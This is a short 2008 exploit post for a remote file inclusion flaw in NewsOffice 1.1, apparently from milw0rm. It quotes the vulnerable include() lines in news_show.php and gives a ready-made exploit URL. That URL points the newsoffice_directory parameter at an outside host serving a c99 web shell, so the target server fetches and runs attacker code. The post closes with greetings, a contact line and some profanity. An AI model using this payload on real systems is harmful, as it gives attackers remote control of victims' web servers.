NewsOffice 1.1 Remote File Inclusion Vulnerability :

Date : 2008-04-11 Author : RoMaNcYxHaCkEr
-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : NewsOffice 1.1 Remote File Include Vulnerabilitiy

# Download From : http://www.newanz.com/applications/NewsOffice/?page=download

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Vulne Code In File news_show.php In Different Lines :

include($newsoffice_directory."config.php");
include($newsoffice_directory."news_data.php");
include($newsoffice_directory."template.php");

# Exploit :

http://WwW.4RxH.CoM/NewsOffice/news_show.php?newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?

Also The Version 1.0 Is Infected In Same File

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : [email protected]

# Fuck Own Life  :( 

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-04-11]

C1

 

C2

 

C3